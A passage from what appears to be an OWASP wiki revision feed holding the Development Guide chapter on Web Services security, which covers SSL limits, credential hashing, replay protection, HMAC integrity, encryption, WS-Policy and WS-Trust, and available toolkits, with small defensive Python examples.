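def timestamp_is_fresh(created: str, expires: str,
                       now: datetime = None,
                       max_skew: timedelta = timedelta(seconds=300)) -> bool:
    """Accept the header only if now falls within [Created - skew, Expires + skew]."""
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    created_at = datetime.strptime(created, fmt).replace(tzinfo=timezone.utc)
    expires_at = datetime.strptime(expires, fmt).replace(tzinfo=timezone.utc)
    if now is None:
        now = datetime.now(timezone.utc)
    return created_at - max_skew <= now <= expires_at + max_skew

# Checked against a clock inside and outside the validity window.
inside = datetime(2005, 1, 27, 17, 0, 0, tzinfo=timezone.utc)
outside = datetime(2005, 1, 28, 0, 0, 0, tzinfo=timezone.utc)
print(timestamp_is_fresh("2005-01-27T16:46:10Z", "2005-01-27T18:46:10Z", now=inside))
print(timestamp_is_fresh("2005-01-27T16:46:10Z", "2005-01-27T18:46:10Z", now=outside))
```

A real deployment would also cache recently seen timestamps or nonces within the window to detect replays, which the freshness check alone does not prevent.&lt;br /&gt;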
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors: credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining a binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who he claims to be are completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks it against the backend user store, or extracts the subject name from the X.509 certificate used for signing the message, verifies the certificate chain, and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java bindings for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS executes its access checks on incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Service communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient detail to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities – a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply the appropriate message-protection measures when constructing requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types; the one for security is WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via the trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, neither the WS-Policy nor the WS-Trust specification has been submitted for standardization to public bodies, and their development is progressing via private collaboration among several companies, although it has been opened up to other participants as well. On the positive side, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is the theory. In practice, there are many obstacles hidden along the way, and one of the major ones is security concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction: incompatible authentication and authorization models for users, the amount of trust between the services themselves and ways of establishing such trust, maintaining secure connections, and synchronizing user directories or otherwise exchanging users’ attributes. These issues are briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained for the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as user populations tend to change frequently across domains. So, how does a service in domain B decide whether to trust a user’s claim that he has already been authenticated in domain A? There are different aspects to this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and that authentication tokens from one domain are acceptable in the other. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for the user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and only the fact that a user with a certain ID has successfully authenticated in another domain is communicated – as would be the case with several large corporations that would like to form a partnership but are reluctant to share customer details. The decision to accept such a request is then based on inter-domain procedures establishing special trust relationships and allowing the exchange of such opaque tokens – an example of Federation relationships. Of those efforts, the most notable example is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most existing deployments are POCs or internal pilot projects rather than real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations that assess the conformance of incoming SOAP messages to the applicable standards, and that appropriately secure the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the light of day. The next release of WSE, 3.0, is going to coincide with the VS.2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area, and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service and interoperability is a requirement (which is usually the case), then in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle the WS-Security and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said, the WSE package itself contains very rich and well-structured functionality, which can be utilized with both ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing basic message security as well as WS-Trust with WS-SecureConversation. The latter are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e., XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging in implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a number of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in version 1.5 is limited to an implementation of the core WSS standard with the username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems rather than toolkits or frameworks. On the one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the tools necessary to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy – checking signatures, tokens, etc. – before passing them on to the target Web Service. When applied to outgoing SOAP messages, they act as a proxy, altering the messages to decorate them with the required security elements and to sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on back-end user and policy stores to evaluate the credentials extracted from the WSS header in a broader context. An example of such a system is TransactionMinder from the former Netegrity – a Policy Enforcement Point for the Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold and allow for real-time processing of huge documents, decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of these systems – in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come with a price, however: the performance and simplicity hold only as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides the scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at the problems surrounding currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which presumably reduces risk through an exhaustive reviewing and commenting process, error scenarios still slip in periodically, as no amount of theory can match the testing that results from thousands of developers pounding on a standard in the real world. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is slow – an accepted reality – and SOAP processing slows it down even more. With expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market face this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while improving performance substantially (by orders of magnitude), cannot always be used as an optimal solution, as they cannot easily be integrated with the existing back-end software infrastructure – at least, not without making performance sacrifices. Another consideration is whether hardware-based systems are the right solution at all: they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex and have a very steep learning curve. Most current products dealing with Web Service security suffer from mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the technologies involved, especially since the errors that end users see usually carry very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying administrators with ready-for-deployment security templates matching the most popular business use cases, but rather at establishing a least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have the XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanisms have many well-documented deployment and usability issues. Systems that opt for homegrown key-management mechanisms run significant risks, since the questions of storing, updating, and recovering secret and private keys are more often than not inadequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59468</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59468"/>
				<updated>2009-04-26T11:55:29Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Types of tokens */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web Services developers, and methods to address them. Due to space limitations, it cannot examine all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader toward the appropriate usage patterns, and to warn about potential roadblocks along the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, viewing them as nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better, because a C# application could read the data.  But it has another flaw: let's assume your stock application is not the only one the C# application needs to interact with.  Maybe it also needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable work to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format – one that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level solution approaches discussed in the following sections are valid for pretty much any distributed application, with some variation in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement – and an even more commonly implemented approach – of “we are using SSL to protect all communication, so we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of the most common pitfalls of using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on a server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information at the intermediate or destination servers – in log files (where it can be browsed by anybody) and local caches – aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials and for ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent but accepts a different format of the same credentials, would require altering the client and would prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for the message-oriented SOAP communication model of Web Services.&lt;br /&gt;
&lt;br /&gt;
That said, the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach, and make a conscious trade-off at design time as to whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
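This conversion can be illustrated in a few lines of Python; the token bytes below are made up stand-ins for a real binary credential such as the DER encoding of an X.509 certificate:&lt;br /&gt;

```python
import base64

# Hypothetical binary security token; a real one would come from a
# keystore or certificate file.
binary_token = bytes([0x30, 0x82, 0x01, 0x0A, 0xFF, 0x00])

# Encode to text so the token can be embedded in an XML/SOAP message.
encoded = base64.b64encode(binary_token).decode("ascii")

# The receiver restores the original bytes unambiguously.
decoded = base64.b64decode(encoded)
assert decoded == binary_token
```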
&lt;br /&gt;
Second, passing credentials carries an inherent risk of disclosure – either by sniffing them during wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted or never sent “in the clear” at all. The usual ways to avoid sending sensitive credentials are cryptographic hashing and/or signatures.&lt;br /&gt;
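As a sketch of the hashing approach, the following Python computes a digest in the style of the WSS UsernameToken profile – Base64 of a SHA-1 hash over a nonce, the creation time, and the password – so that the password itself never travels in the clear. The password value is made up:&lt;br /&gt;

```python
import base64, datetime, hashlib, os

def password_digest(nonce, created, password):
    """Digest in the style of the WSS UsernameToken profile:
    Base64(SHA-1(nonce + created + password))."""
    raw = hashlib.sha1(nonce + created.encode() + password.encode()).digest()
    return base64.b64encode(raw).decode("ascii")

nonce = os.urandom(16)                      # fresh per-message nonce
created = datetime.datetime.now(datetime.timezone.utc).isoformat()
sent = password_digest(nonce, created, "s3cret")

# The server, which knows the password, recomputes and compares.
assert sent == password_digest(nonce, created, "s3cret")
```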
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
The usual means of protecting against replayed messages are either using unique identifiers (nonces) on messages and keeping track of the ones already processed, or using a relatively short validity time window. In the Web Services world, information about message creation time is usually communicated by inserting timestamps, which may simply state the instant the message was created, or carry additional information, like an expiration time or certain conditions.&lt;br /&gt;
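The nonce-plus-window scheme can be sketched as follows; the window size and nonce values are arbitrary choices for illustration:&lt;br /&gt;

```python
import time

seen_nonces = {}        # nonce -> time the message was first accepted
VALIDITY_WINDOW = 300   # seconds a timestamp is honoured

def accept(nonce, created, now):
    """Reject a message whose timestamp falls outside the validity
    window, or whose nonce was already processed (a replay)."""
    if abs(now - created) > VALIDITY_WINDOW:
        return False
    if nonce in seen_nonces:
        return False
    seen_nonces[nonce] = now
    return True

t = time.time()
assert accept("n-1", t, t + 10)            # fresh message accepted
assert not accept("n-1", t, t + 20)        # same nonce replayed
assert not accept("n-2", t, t + 600)       # timestamp expired
```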
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” where the server’s or clients’ clocks drift too much and prevent timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “Do I trust the caller?” and “Did the caller create this message?” Assuming that caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). A change may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from a bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms like checksums applied to ensure a packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing an HMAC, or by combining message digests with either cryptographic signatures or secret-key encryption (assuming the keys are known only to the two communicating parties), so that any change will immediately result in a cryptographic error.&lt;br /&gt;
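A minimal HMAC-based integrity check might look like this in Python; the shared key and message content are placeholders:&lt;br /&gt;

```python
import hashlib, hmac

secret_key = b"shared-secret"            # known only to the two parties
message = b"Body: withdraw 100 from account 42"

# The sender attaches an HMAC tag to the message.
tag = hmac.new(secret_key, message, hashlib.sha256).hexdigest()

def verify(msg, received_tag):
    """Recompute the tag and compare in constant time; any change to
    the message or tag makes verification fail."""
    expected = hmac.new(secret_key, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, received_tag)

assert verify(message, tag)
assert not verify(b"Body: withdraw 999 from account 42", tag)
```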
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, ensuring integrity is not sufficient – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. This may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since they are significantly faster than asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
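The hybrid pattern can be sketched as follows. Note that the XOR keystream below is a toy stand-in for a real symmetric cipher such as AES – it is shown only to illustrate the key-management flow (fresh session key per exchange, bulk symmetric encryption, asymmetric wrapping of the key) and is not usable for actual protection:&lt;br /&gt;

```python
import hashlib, secrets

def toy_stream(key, data):
    """Toy XOR keystream in place of a real symmetric cipher (AES);
    illustrative only -- do not use for real protection."""
    stream = hashlib.sha256(key).digest()
    while len(data) > len(stream):
        stream += hashlib.sha256(stream).digest()
    return bytes(a ^ b for a, b in zip(data, stream))

plaintext = b"sensitive business payload"

# 1. Generate a fresh symmetric session key for this one exchange.
session_key = secrets.token_bytes(32)

# 2. Encrypt the bulk data with the fast symmetric algorithm.
ciphertext = toy_stream(session_key, plaintext)

# 3. The session key itself would then be wrapped with the recipient's
#    public (asymmetric) key, sent alongside, and discarded after use.

# Symmetric: applying the same keystream again recovers the plaintext.
assert toy_stream(session_key, ciphertext) == plaintext
```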
&lt;br /&gt;
Applying encryption requires extensive setup work, since the communicating parties now have to know which keys they can trust, deal with certificate and key validation, and know which keys should be used for which communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities – the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by a server controlled by members of the IT department. &lt;br /&gt;
